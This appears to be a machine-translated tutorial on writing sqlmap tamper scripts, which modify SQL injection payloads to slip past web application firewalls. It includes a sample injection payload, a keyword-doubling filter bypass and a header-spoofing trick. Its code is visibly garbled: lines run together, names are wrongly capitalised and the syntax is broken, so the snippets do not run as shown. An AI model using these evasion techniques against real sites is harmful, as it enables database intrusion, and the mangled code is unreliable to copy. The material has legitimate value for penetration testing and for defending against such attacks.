Sqlmap-tamper Preparation Guide

Note: Recently encountered some strange WAF, want to write some of their own tamper but found no reference material can be used, so in writing this article, a convenient for the custom tamper writing. The author powerful strokes is limited, if has the mistake, asks the reader to correct.

0x00 Sqlmap Tamper Introduction

SQLMAP is an automated SQL injection tool, and tamper is a series of scripts to extend it, with the primary function of making specific changes to the original payload to bypass the WAF.

0x01 one of the smallest examples

To illustrate the structure of tamper, let's start with one of the simplest examples

# sqlmap/tamper/escapequotes.pyfrom Lib.core.enums Import priority__priority__ = priority. Lowestdef dependencies ():    passdef Tamper (payload, **kwargs):    return Payload.replace ("'", "\ \" "). Replace ('" ') , ‘\\"‘)

　　

It is not difficult to see that a minimal tamper script structure is defined for the priority variable and the dependencies, tamper function.

Priority defines the precedence of the script for cases where there are multiple tamper scripts.

The dependencies function declares that the script applies/does not apply to a range that can be empty.

Tamper is the main function, and the accepted parameters are payload and **kwargs
The return value is the replaced payload. For example, the quotation marks are replaced with \ \ '.

0x02 Detailed Introduction

The first part completes the simplest tamper architecture, and below we make a more detailed introduction

Tamper function

Tamper is the body of the entire script. Mainly used to modify the original payload.
For a simple example, if there are a few lines of code on the server

$id = Trim ($POST ($id),'Union'); $sql="select * from users WHERE id= ' $ Id '";

And our payload is the

-8363'  Union SELECT null---

This is because the union is filtered out and will cause payload not to execute properly, so you can write this tamper

def Tamper (Payload, * *Kwargs)    :return payload.replace ('Union  ','uniounionn')

Save to test.py, save to sqlmap/tamper/, execute the time with--tamper=test parameters, you can bypass the filter rule

dependencies function

The dependencies function, which declares the tamper script support/unsupported environment, is a simple example of the following:

# sqlmap/tamper/echarunicodeencode.pyfrom Lib.core.common Import singletimewarnmessagedef dependencies ():    Singletimewarnmessage ("Tamper script '%s ' is only meant to be run against ASP or ASP. NET Web applications"% Os.path.basen Ame (__file__). Split (".") [0]) # singletimewarnmessage () to print out a warning message in the console

　　

Kwargs in the official 47 tamper script, the Kwargs parameter was only used two times, both of which only changed the HTTP-header, here is one example for a simple explanation

# sqlmap/tamper/vanrish.py def Tamper (Payload, * *Kwargs)    := Kwargs.get ("headers", {})    headers["x-originating-ip" "127.0.0.1"     return payload

This script is intended to change the X-originating-ip to bypass the WAF, and the use of another Kwargs appears in xforwardedfor.py, also to change the header to bypass the WAF

0x3 Conclusion

Tamper's writing is far more than this, this article only discusses its most basic structure. As an extension of sqlmap, almost all of the sqlmap built-in functions and variables can be used when writing tamper, which is not listed in this article.

0x04 some of the commonly used values

#sqlmap/lib/enums.pyclasspriority:lowest=-100LOWER=-50 Low=-10NORMAL=0 High= 10Higher= 50Highest= 100classdbms:access="Microsoft Access"DB2="IBM DB2"FIREBIRD="Firebird"MAXDB="SAP MaxDB"MSSQL="Microsoft SQL Server"MYSQL="MySQL"ORACLE="Oracle"Pgsql="PostgreSQL"SQLITE="SQLite"SYBASE="Sybase"HSQLDB="HSQLDB"

Sqlmap-tamper Preparation Guide